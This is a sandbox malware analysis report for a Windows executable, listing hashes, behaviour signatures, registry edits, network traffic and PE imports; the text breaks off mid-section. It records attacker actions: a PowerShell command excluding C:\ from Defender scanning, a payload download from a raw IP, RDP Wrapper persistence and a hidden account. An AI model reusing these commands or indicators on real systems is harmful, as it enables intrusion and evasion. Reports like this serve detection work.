
Exes_bf0a5d345937b3fc53bc9ee45c8e22c9_exe_2019-06-25_06_30.json

Jun 25th, 2019
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe"
  7. [*] File Size: 607744
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "3c9414c92e5a224b2b4b9185f46f81e619c82cc40eba94be25db6f7d663bc6de"
  10. [*] MD5: "bf0a5d345937b3fc53bc9ee45c8e22c9"
  11. [*] SHA1: "f99fa397c1946ce267bb16d1d48396074e20d277"
  12. [*] SHA512: "96020fe343500bde7fd74b72be555efc35d2ddf8d8b8534759c461ee221319358b267102ce92aec0691a7106f58f0e0c6efffbe09112c641f3ce5b62ba7efaa3"
  13. [*] CRC32: "2C5ADCDC"
  14. [*] SSDEEP: "12288:Z1MThUwpGV49lAPZrMdJAJx95FrWYe2n4x/3/Xml:HSKwpu4DAhrkuP5FrWYe2n4Z3/2"
  15.  
  16. [*] Process Execution: [
  17. "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe",
  18. "powershell.exe",
  19. "images.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "services.exe",
  23. "svchost.exe",
  24. "svchost.exe",
  25. "svchost.exe",
  26. "lsm.exe"
  27. ]
  28.  
  29. [*] Signatures Detected: [
  30. {
  31. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  32. "Details": [
  33. {
  34. "IP": "5.206.225.104:80"
  35. },
  36. {
  37. "IP": "216.58.204.67:80"
  38. }
  39. ]
  40. },
  41. {
  42. "Description": "Creates RWX memory",
  43. "Details": []
  44. },
  45. {
  46. "Description": "Loads a driver",
  47. "Details": [
  48. {
  49. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  50. }
  51. ]
  52. },
  53. {
  54. "Description": "Reads data out of its own binary image",
  55. "Details": [
  56. {
  57. "self_read": "process: images.exe, pid: 2640, offset: 0x00000000, length: 0x00094600"
  58. }
  59. ]
  60. },
  61. {
  62. "Description": "A process created a hidden window",
  63. "Details": [
  64. {
  65. "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
  66. }
  67. ]
  68. },
  69. {
  70. "Description": "Drops a binary and executes it",
  71. "Details": [
  72. {
  73. "binary": "C:\\ProgramData\\images.exe"
  74. }
  75. ]
  76. },
  77. {
  78. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  79. "Details": [
  80. {
  81. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  82. },
  83. {
  84. "suspicious_request": "http://5.206.225.104/dll/upnp.exe"
  85. }
  86. ]
  87. },
  88. {
  89. "Description": "Performs some HTTP requests",
  90. "Details": [
  91. {
  92. "url": "http://5.206.225.104/dll/upnp.exe"
  93. }
  94. ]
  95. },
  96. {
  97. "Description": "Code injection with CreateRemoteThread in a remote process",
  98. "Details": [
  99. {
  100. "Injection": "images.exe(2640) -> cmd.exe(2880)"
  101. }
  102. ]
  103. },
  104. {
  105. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  106. "Details": [
  107. {
  108. "Process": "svchost.exe (2508)"
  109. }
  110. ]
  111. },
  112. {
  113. "Description": "Attempts to stop active services",
  114. "Details": [
  115. {
  116. "servicename": "UmRdpService"
  117. }
  118. ]
  119. },
  120. {
  121. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  122. "Details": [
  123. {
  124. "Process": "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe tried to sleep 1000 seconds, actually delayed analysis time by 0 seconds"
  125. },
  126. {
  127. "Process": "images.exe tried to sleep 4003 seconds, actually delayed analysis time by 0 seconds"
  128. }
  129. ]
  130. },
  131. {
  132. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  133. "Details": [
  134. {
  135. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 86885 times"
  136. }
  137. ]
  138. },
  139. {
  140. "Description": "Installs itself for autorun at Windows startup",
  141. "Details": [
  142. {
  143. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
  144. },
  145. {
  146. "data": "C:\\ProgramData\\images.exe"
  147. },
  148. {
  149. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
  150. },
  151. {
  152. "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
  153. }
  154. ]
  155. },
  156. {
  157. "Description": "Creates a hidden or system file",
  158. "Details": [
  159. {
  160. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP"
  161. }
  162. ]
  163. },
  164. {
  165. "Description": "Attempts to modify proxy settings",
  166. "Details": []
  167. },
  168. {
  169. "Description": "Creates a copy of itself",
  170. "Details": [
  171. {
  172. "copy": "C:\\ProgramData\\images.exe"
  173. }
  174. ]
  175. },
  176. {
  177. "Description": "Collects information to fingerprint the system",
  178. "Details": []
  179. }
  180. ]
  181.  
  182. [*] Started Service: [
  183. "TermService",
  184. "UmRdpService"
  185. ]
  186.  
  187. [*] Executed Commands: [
  188. "powershell Add-MpPreference -ExclusionPath C:\\",
  189. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  190. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"
  191. ]
  192.  
  193. [*] Mutexes: [
  194. "Local\\_!MSFTHISTORY!_",
  195. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  196. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  197. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  198. "Local\\WininetStartupMutex",
  199. "Local\\WininetConnectionMutex",
  200. "Local\\WininetProxyRegistryMutex",
  201. "Global\\CLR_CASOFF_MUTEX",
  202. "TSLicensingLock"
  203. ]
  204.  
  205. [*] Modified Files: [
  206. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  207. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  208. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  209. "C:\\ProgramData\\images.exe",
  210. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  211. "\\??\\PIPE\\srvsvc",
  212. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
  213. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  214. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\25-06-2019_01.13.22",
  215. "\\??\\PIPE\\samr",
  216. "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
  217. "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
  218. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\014MXUFI059OALDHZTJQ.temp",
  219. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
  220. "C:\\rdpwrap.txt",
  221. "\\Device\\Termdd",
  222. "\\Device\\RdpDr",
  223. "\\??\\root#umbus#0000#{65a9a6cf-64cd-480b-843e-32c86e1ba19f}"
  224. ]
  225.  
  226. [*] Deleted Files: [
  227. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
  228. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1428.7378156",
  229. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1428.7378156",
  230. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1428.7378156",
  231. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
  232. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.7424765",
  233. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.7424765",
  234. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.7424765"
  235. ]
  236.  
  237. [*] Modified Registry Keys: [
  238. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  239. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
  241. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
  243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
  244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\inst",
  246. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
  247. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  248. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
  249. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
  250. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
  251. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
  252. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
  253. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
  254. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
  255. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  256. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\Kwsogfk",
  257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rudp",
  258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rpdp",
  259. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
  260. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  261. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  262. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  263. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  264. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
  265. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  266. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Type",
  267. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Start",
  268. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\ErrorControl",
  269. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\DisplayName",
  270. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  271. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  272. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  273. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  274. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld"
  275. ]
  276.  
  277. [*] Deleted Registry Keys: [
  278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
  280. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
  281. ]
  282.  
  283. [*] DNS Communications: [
  284. {
  285. "type": "A",
  286. "request": "google.be",
  287. "answers": [
  288. {
  289. "data": "216.58.204.67",
  290. "type": "A"
  291. }
  292. ]
  293. },
  294. {
  295. "type": "A",
  296. "request": "ozcall.duckdns.org",
  297. "answers": [
  298. {
  299. "data": "213.208.152.199",
  300. "type": "A"
  301. }
  302. ]
  303. }
  304. ]
  305.  
  306. [*] Domains: [
  307. {
  308. "ip": "216.58.206.131",
  309. "domain": "google.be"
  310. },
  311. {
  312. "ip": "213.208.152.199",
  313. "domain": "ozcall.duckdns.org"
  314. }
  315. ]
  316.  
  317. [*] Network Communication - ICMP: []
  318.  
  319. [*] Network Communication - HTTP: [
  320. {
  321. "count": 1,
  322. "body": "",
  323. "uri": "http://5.206.225.104/dll/upnp.exe",
  324. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  325. "method": "GET",
  326. "host": "5.206.225.104",
  327. "version": "1.1",
  328. "path": "/dll/upnp.exe",
  329. "data": "GET /dll/upnp.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 5.206.225.104\r\nConnection: Keep-Alive\r\n\r\n",
  330. "port": 80
  331. }
  332. ]
  333.  
  334. [*] Network Communication - SMTP: []
  335.  
  336. [*] Network Communication - Hosts: []
  337.  
  338. [*] Network Communication - IRC: []
  339.  
  340. [*] Static Analysis: {
  341. "pe": {
  342. "peid_signatures": null,
  343. "imports": [
  344. {
  345. "imports": [
  346. {
  347. "name": "FlushFileBuffers",
  348. "address": "0x43603c"
  349. },
  350. {
  351. "name": "GetConsoleCP",
  352. "address": "0x436040"
  353. },
  354. {
  355. "name": "GetConsoleMode",
  356. "address": "0x436044"
  357. },
  358. {
  359. "name": "HeapSize",
  360. "address": "0x436048"
  361. },
  362. {
  363. "name": "HeapReAlloc",
  364. "address": "0x43604c"
  365. },
  366. {
  367. "name": "GetProcessHeap",
  368. "address": "0x436050"
  369. },
  370. {
  371. "name": "SetFilePointerEx",
  372. "address": "0x436054"
  373. },
  374. {
  375. "name": "WriteConsoleW",
  376. "address": "0x436058"
  377. },
  378. {
  379. "name": "GetStringTypeW",
  380. "address": "0x43605c"
  381. },
  382. {
  383. "name": "SetStdHandle",
  384. "address": "0x436060"
  385. },
  386. {
  387. "name": "CreateFileW",
  388. "address": "0x436064"
  389. },
  390. {
  391. "name": "AllocConsole",
  392. "address": "0x436068"
  393. },
  394. {
  395. "name": "GetGeoInfoA",
  396. "address": "0x43606c"
  397. },
  398. {
  399. "name": "K32EnumPageFilesW",
  400. "address": "0x436070"
  401. },
  402. {
  403. "name": "DefineDosDeviceW",
  404. "address": "0x436074"
  405. },
  406. {
  407. "name": "Sleep",
  408. "address": "0x436078"
  409. },
  410. {
  411. "name": "FreeEnvironmentStringsW",
  412. "address": "0x43607c"
  413. },
  414. {
  415. "name": "GetEnvironmentStringsW",
  416. "address": "0x436080"
  417. },
  418. {
  419. "name": "GetCommandLineW",
  420. "address": "0x436084"
  421. },
  422. {
  423. "name": "GetCommandLineA",
  424. "address": "0x436088"
  425. },
  426. {
  427. "name": "GetCPInfo",
  428. "address": "0x43608c"
  429. },
  430. {
  431. "name": "GetOEMCP",
  432. "address": "0x436090"
  433. },
  434. {
  435. "name": "IsValidCodePage",
  436. "address": "0x436094"
  437. },
  438. {
  439. "name": "FindNextFileA",
  440. "address": "0x436098"
  441. },
  442. {
  443. "name": "VirtualProtect",
  444. "address": "0x43609c"
  445. },
  446. {
  447. "name": "VirtualAlloc",
  448. "address": "0x4360a0"
  449. },
  450. {
  451. "name": "FindFirstFileExA",
  452. "address": "0x4360a4"
  453. },
  454. {
  455. "name": "FindClose",
  456. "address": "0x4360a8"
  457. },
  458. {
  459. "name": "CloseHandle",
  460. "address": "0x4360ac"
  461. },
  462. {
  463. "name": "GetFileType",
  464. "address": "0x4360b0"
  465. },
  466. {
  467. "name": "LCMapStringW",
  468. "address": "0x4360b4"
  469. },
  470. {
  471. "name": "HeapFree",
  472. "address": "0x4360b8"
  473. },
  474. {
  475. "name": "HeapAlloc",
  476. "address": "0x4360bc"
  477. },
  478. {
  479. "name": "GetACP",
  480. "address": "0x4360c0"
  481. },
  482. {
  483. "name": "GetModuleHandleExW",
  484. "address": "0x4360c4"
  485. },
  486. {
  487. "name": "ExitProcess",
  488. "address": "0x4360c8"
  489. },
  490. {
  491. "name": "WideCharToMultiByte",
  492. "address": "0x4360cc"
  493. },
  494. {
  495. "name": "MultiByteToWideChar",
  496. "address": "0x4360d0"
  497. },
  498. {
  499. "name": "GetModuleFileNameA",
  500. "address": "0x4360d4"
  501. },
  502. {
  503. "name": "WriteFile",
  504. "address": "0x4360d8"
  505. },
  506. {
  507. "name": "GetStdHandle",
  508. "address": "0x4360dc"
  509. },
  510. {
  511. "name": "RaiseException",
  512. "address": "0x4360e0"
  513. },
  514. {
  515. "name": "LoadLibraryExW",
  516. "address": "0x4360e4"
  517. },
  518. {
  519. "name": "GetProcAddress",
  520. "address": "0x4360e8"
  521. },
  522. {
  523. "name": "FreeLibrary",
  524. "address": "0x4360ec"
  525. },
  526. {
  527. "name": "TlsFree",
  528. "address": "0x4360f0"
  529. },
  530. {
  531. "name": "TlsSetValue",
  532. "address": "0x4360f4"
  533. },
  534. {
  535. "name": "TlsGetValue",
  536. "address": "0x4360f8"
  537. },
  538. {
  539. "name": "TlsAlloc",
  540. "address": "0x4360fc"
  541. },
  542. {
  543. "name": "InitializeCriticalSectionAndSpinCount",
  544. "address": "0x436100"
  545. },
  546. {
  547. "name": "DeleteCriticalSection",
  548. "address": "0x436104"
  549. },
  550. {
  551. "name": "DecodePointer",
  552. "address": "0x436108"
  553. },
  554. {
  555. "name": "UnhandledExceptionFilter",
  556. "address": "0x43610c"
  557. },
  558. {
  559. "name": "SetUnhandledExceptionFilter",
  560. "address": "0x436110"
  561. },
  562. {
  563. "name": "GetCurrentProcess",
  564. "address": "0x436114"
  565. },
  566. {
  567. "name": "TerminateProcess",
  568. "address": "0x436118"
  569. },
  570. {
  571. "name": "IsProcessorFeaturePresent",
  572. "address": "0x43611c"
  573. },
  574. {
  575. "name": "QueryPerformanceCounter",
  576. "address": "0x436120"
  577. },
  578. {
  579. "name": "GetCurrentProcessId",
  580. "address": "0x436124"
  581. },
  582. {
  583. "name": "GetCurrentThreadId",
  584. "address": "0x436128"
  585. },
  586. {
  587. "name": "GetSystemTimeAsFileTime",
  588. "address": "0x43612c"
  589. },
  590. {
  591. "name": "InitializeSListHead",
  592. "address": "0x436130"
  593. },
  594. {
  595. "name": "IsDebuggerPresent",
  596. "address": "0x436134"
  597. },
  598. {
  599. "name": "GetStartupInfoW",
  600. "address": "0x436138"
  601. },
  602. {
  603. "name": "GetModuleHandleW",
  604. "address": "0x43613c"
  605. },
  606. {
  607. "name": "RtlUnwind",
  608. "address": "0x436140"
  609. },
  610. {
  611. "name": "GetLastError",
  612. "address": "0x436144"
  613. },
  614. {
  615. "name": "SetLastError",
  616. "address": "0x436148"
  617. },
  618. {
  619. "name": "EnterCriticalSection",
  620. "address": "0x43614c"
  621. },
  622. {
  623. "name": "LeaveCriticalSection",
  624. "address": "0x436150"
  625. }
  626. ],
  627. "dll": "KERNEL32.dll"
  628. },
  629. {
  630. "imports": [
  631. {
  632. "name": "FindWindowW",
  633. "address": "0x4361b4"
  634. },
  635. {
  636. "name": "GetTouchInputInfo",
  637. "address": "0x4361b8"
  638. },
  639. {
  640. "name": "DdeCmpStringHandles",
  641. "address": "0x4361bc"
  642. },
  643. {
  644. "name": "MessageBoxA",
  645. "address": "0x4361c0"
  646. }
  647. ],
  648. "dll": "USER32.dll"
  649. },
  650. {
  651. "imports": [
  652. {
  653. "name": null,
  654. "address": "0x4361e4"
  655. }
  656. ],
  657. "dll": "WINSPOOL.DRV"
  658. },
  659. {
  660. "imports": [
  661. {
  662. "name": "DuplicateToken",
  663. "address": "0x436000"
  664. },
  665. {
  666. "name": "ObjectPrivilegeAuditAlarmA",
  667. "address": "0x436004"
  668. },
  669. {
  670. "name": "PerfDecrementULongCounterValue",
  671. "address": "0x436008"
  672. },
  673. {
  674. "name": "CredUnmarshalCredentialA",
  675. "address": "0x43600c"
  676. }
  677. ],
  678. "dll": "ADVAPI32.dll"
  679. },
  680. {
  681. "imports": [
  682. {
  683. "name": "VarBstrFromDate",
  684. "address": "0x436170"
  685. }
  686. ],
  687. "dll": "OLEAUT32.dll"
  688. },
  689. {
  690. "imports": [
  691. {
  692. "name": "AVIStreamRelease",
  693. "address": "0x436014"
  694. }
  695. ],
  696. "dll": "AVIFIL32.dll"
  697. },
  698. {
  699. "imports": [
  700. {
  701. "name": "DeregisterManageableLogClient",
  702. "address": "0x4361f8"
  703. }
  704. ],
  705. "dll": "clfsw32.dll"
  706. },
  707. {
  708. "imports": [
  709. {
  710. "name": "ClusterNodeGetEnumCount",
  711. "address": "0x43601c"
  712. }
  713. ],
  714. "dll": "CLUSAPI.dll"
  715. },
  716. {
  717. "imports": [
  718. {
  719. "name": "ImageList_AddMasked",
  720. "address": "0x436024"
  721. }
  722. ],
  723. "dll": "COMCTL32.dll"
  724. },
  725. {
  726. "imports": [
  727. {
  728. "name": "UnDecorateSymbolNameW",
  729. "address": "0x436200"
  730. }
  731. ],
  732. "dll": "dbghelp.dll"
  733. },
  734. {
  735. "imports": [
  736. {
  737. "name": "DnsDhcpRegisterHostAddrs",
  738. "address": "0x43602c"
  739. }
  740. ],
  741. "dll": "DNSAPI.dll"
  742. },
  743. {
  744. "imports": [
  745. {
  746. "name": null,
  747. "address": "0x436208"
  748. }
  749. ],
  750. "dll": "dsuiext.dll"
  751. },
  752. {
  753. "imports": [
  754. {
  755. "name": "GetMonitorContrast",
  756. "address": "0x436210"
  757. }
  758. ],
  759. "dll": "dxva2.dll"
  760. },
  761. {
  762. "imports": [
  763. {
  764. "name": null,
  765. "address": "0x436218"
  766. },
  767. {
  768. "name": "GdipDisposeImageAttributes",
  769. "address": "0x43621c"
  770. },
  771. {
  772. "name": "GdipGetImageFlags",
  773. "address": "0x436220"
  774. },
  775. {
  776. "name": "GdipSetPathGradientPresetBlend",
  777. "address": "0x436224"
  778. }
  779. ],
  780. "dll": "gdiplus.dll"
  781. },
  782. {
  783. "imports": [
  784. {
  785. "name": "NotifyAddrChange",
  786. "address": "0x436034"
  787. }
  788. ],
  789. "dll": "IPHLPAPI.DLL"
  790. },
  791. {
  792. "imports": [
  793. {
  794. "name": null,
  795. "address": "0x436158"
  796. }
  797. ],
  798. "dll": "MAPI32.dll"
  799. },
  800. {
  801. "imports": [
  802. {
  803. "name": "MprAdminInterfaceGetCredentials",
  804. "address": "0x436160"
  805. }
  806. ],
  807. "dll": "MPRAPI.dll"
  808. },
  809. {
  810. "imports": [
  811. {
  812. "name": "DRMGetEnvironmentInfo",
  813. "address": "0x43622c"
  814. }
  815. ],
  816. "dll": "msdrm.dll"
  817. },
  818. {
  819. "imports": [
  820. {
  821. "name": "ICInfo",
  822. "address": "0x436168"
  823. }
  824. ],
  825. "dll": "MSVFW32.dll"
  826. },
  827. {
  828. "imports": [
  829. {
  830. "name": "glColor4sv",
  831. "address": "0x436178"
  832. }
  833. ],
  834. "dll": "OPENGL32.dll"
  835. },
  836. {
  837. "imports": [
  838. {
  839. "name": "VariantToUInt32",
  840. "address": "0x436180"
  841. }
  842. ],
  843. "dll": "PROPSYS.dll"
  844. },
  845. {
  846. "imports": [
  847. {
  848. "name": "ResUtilSetResourceServiceEnvironment",
  849. "address": "0x436188"
  850. }
  851. ],
  852. "dll": "RESUTILS.dll"
  853. },
  854. {
  855. "imports": [
  856. {
  857. "name": "RpcServerListen",
  858. "address": "0x436190"
  859. },
  860. {
  861. "name": "NdrConformantStringMemorySize",
  862. "address": "0x436194"
  863. }
  864. ],
  865. "dll": "RPCRT4.dll"
  866. },
  867. {
  868. "imports": [
  869. {
  870. "name": "MgmDeleteGroupMembershipEntry",
  871. "address": "0x436234"
  872. }
  873. ],
  874. "dll": "rtm.dll"
  875. },
  876. {
  877. "imports": [
  878. {
  879. "name": "CM_Add_Range",
  880. "address": "0x43619c"
  881. }
  882. ],
  883. "dll": "SETUPAPI.dll"
  884. },
  885. {
  886. "imports": [
  887. {
  888. "name": "DllRegisterWindowClasses",
  889. "address": "0x4361a4"
  890. }
  891. ],
  892. "dll": "SHDOCVW.dll"
  893. },
  894. {
  895. "imports": [
  896. {
  897. "name": "lineGetAddressCaps",
  898. "address": "0x4361ac"
  899. }
  900. ],
  901. "dll": "TAPI32.dll"
  902. },
  903. {
  904. "imports": [
  905. {
  906. "name": "WsCreateMessageForChannel",
  907. "address": "0x43623c"
  908. }
  909. ],
  910. "dll": "webservices.dll"
  911. },
  912. {
  913. "imports": [
  914. {
  915. "name": "WinBioControlUnit",
  916. "address": "0x436244"
  917. }
  918. ],
  919. "dll": "winbio.dll"
  920. },
  921. {
  922. "imports": [
  923. {
  924. "name": "IWICMetadataQueryReader_GetLocation_Proxy",
  925. "address": "0x4361ec"
  926. },
  927. {
  928. "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
  929. "address": "0x4361f0"
  930. }
  931. ],
  932. "dll": "WindowsCodecs.dll"
  933. },
  934. {
  935. "imports": [
  936. {
  937. "name": "WinHttpQueryOption",
  938. "address": "0x4361c8"
  939. }
  940. ],
  941. "dll": "WINHTTP.dll"
  942. },
  943. {
  944. "imports": [
  945. {
  946. "name": "FindNextUrlCacheContainerW",
  947. "address": "0x4361d0"
  948. },
  949. {
  950. "name": "InternetCheckConnectionA",
  951. "address": "0x4361d4"
  952. }
  953. ],
  954. "dll": "WININET.dll"
  955. },
  956. {
  957. "imports": [
  958. {
  959. "name": "waveOutGetErrorTextW",
  960. "address": "0x4361dc"
  961. }
  962. ],
  963. "dll": "WINMM.dll"
  964. },
  965. {
  966. "imports": [
  967. {
  968. "name": null,
  969. "address": "0x43624c"
  970. }
  971. ],
  972. "dll": "wsnmp32.dll"
  973. }
  974. ],
  975. "digital_signers": null,
  976. "exported_dll_name": null,
  977. "actual_checksum": "0x000a0d78",
  978. "overlay": null,
  979. "imagebase": "0x00400000",
  980. "reported_checksum": "0x00000000",
  981. "icon_hash": null,
  982. "entrypoint": "0x0042685e",
  983. "timestamp": "2019-06-23 22:20:50",
  984. "osversion": "5.1",
  985. "sections": [
  986. {
  987. "name": ".text",
  988. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  989. "virtual_address": "0x00001000",
  990. "size_of_data": "0x00034800",
  991. "entropy": "6.32",
  992. "raw_address": "0x00000400",
  993. "virtual_size": "0x0003461b",
  994. "characteristics_raw": "0x60000020"
  995. },
  996. {
  997. "name": ".rdata",
  998. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  999. "virtual_address": "0x00036000",
  1000. "size_of_data": "0x00008c00",
  1001. "entropy": "5.45",
  1002. "raw_address": "0x00034c00",
  1003. "virtual_size": "0x00008bd6",
